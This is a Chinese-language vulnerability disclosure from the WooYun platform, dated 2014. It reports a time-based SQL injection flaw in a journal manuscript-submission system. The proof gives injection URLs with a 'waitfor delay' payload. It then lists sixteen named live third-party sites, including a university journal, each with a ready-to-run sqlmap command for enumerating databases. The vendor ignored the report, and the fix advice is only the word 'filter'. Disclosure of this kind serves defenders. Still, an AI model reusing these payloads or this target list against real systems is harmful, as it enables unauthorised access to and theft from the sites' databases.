漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-080467
漏洞标题:某期刊投稿系统SQL注入漏洞之一
相关厂商:南京杰诺瀚软件科技有限公司
漏洞作者: 路人甲
提交时间:2014-10-23 19:02
修复时间:2015-04-02 11:07
公开时间:2015-04-02 11:07
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-10-23: 细节已通知厂商并且等待厂商处理中
2014-10-28: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-12-22: 细节向核心白帽子及相关领域专家公开
2015-01-01: 细节向普通白帽子公开
2015-01-11: 细节向实习白帽子公开
2015-04-02: 细节向公众公开
简要描述:
~~总之影响众多投稿系统。。
详细说明:
南京杰诺瀚期刊投稿系统存在SQL延迟注入漏洞,可获取数据库任意数据...
官网:http://www.025journal.com/
演示系统:
http://www.025journal.com/demo1/
http://www.025journal.com/demo2/
客户案例:http://www.025journal.com/Web/CommonPage.aspx?Id=8
百度搜索: 投稿系统 技术支持:南京杰诺瀚软件
漏洞证明:
以官网demo作为测试案例:http://www.025journal.com/demo1/
1、手工报错测试
http://www.025journal.com/demo1/web/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1)--
2、延时注入测试
http://www.025journal.com/demo1/web/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1);waitfor%20delay%20%270:0:5%27--
3、sqlmap注入测试
sqlmap -u 'http://www.025journal.com/demo1/web/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
59个数据库,由于是时间延迟注入,获取数据的速度比较慢。。。
在线案例:
(1)http://www.gjmzyfs.com/
sqlmap -u 'http://www.gjmzyfs.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1)*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(2)http://sypf.cnmanu.net
sqlmap -u 'http://sypf.cnmanu.net/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(3)http://xnxyxb.cnmanu.cn/
sqlmap -u 'http://xnxyxb.cnmanu.cn/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(4)http://www.lcjsyx.com/
sqlmap -u 'http://www.lcjsyx.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(5)http://gaojian.xhnj.com/
sqlmap -u 'http://gaojian.xhnj.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(6)http://xb.cuit.edu.cn/
sqlmap -u 'http://xb.cuit.edu.cn/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(7)http://sypf.cnmanu.net/
sqlmap -u 'http://sypf.cnmanu.net/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(8)http://sypf.cnmanu.net/
sqlmap -u 'http://sypf.cnmanu.net/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(9)http://tg.fiberglass365.com/
sqlmap -u 'http://tg.fiberglass365.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(10)http://www.xnumed.com/
sqlmap -u 'http://www.xnumed.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(11)http://www.mfskin.net/
sqlmap -u 'http://www.mfskin.net/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(12)http://www.jsnyxb.com/
sqlmap -u 'http://www.jsnyxb.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(13)http://www.lcsjbx.com/
sqlmap -u 'http://www.lcsjbx.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(14)http://www.chinaelectrondevices.com/
sqlmap -u 'http://www.chinaelectrondevices.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(15)http://www.apsjournal.com/
sqlmap -u 'http://www.apsjournal.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*'--dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
(16)http://www.gjmzyfs.com/
sqlmap -u 'http://www.gjmzyfs.com/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-04-02 11:07
厂商回复:
最新状态:
暂无